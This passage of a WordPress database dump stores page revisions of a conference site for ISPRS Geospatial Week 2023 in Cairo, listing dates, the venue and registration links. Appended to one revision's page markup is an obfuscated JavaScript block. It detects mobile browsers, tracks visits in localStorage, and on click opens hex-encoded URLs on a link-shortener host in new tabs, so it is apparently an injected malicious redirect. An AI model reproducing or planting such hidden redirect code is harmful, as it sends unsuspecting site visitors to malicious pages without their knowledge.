start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3220\" img_size=\"500x375\" alignment=\"center\"][/vc_column][vc_column width=\"1/2\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 20:51:02','2022-11-09 20:51:02','',3066,'https://gsw2023.com/?p=3223',0,'revision','',0),
(3224,1,'2022-11-09 20:53:43','2022-11-09 20:53:43','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\r\n<h3></h3>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3220\" img_size=\"500x375\" alignment=\"center\"][/vc_column][vc_column width=\"1/2\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner 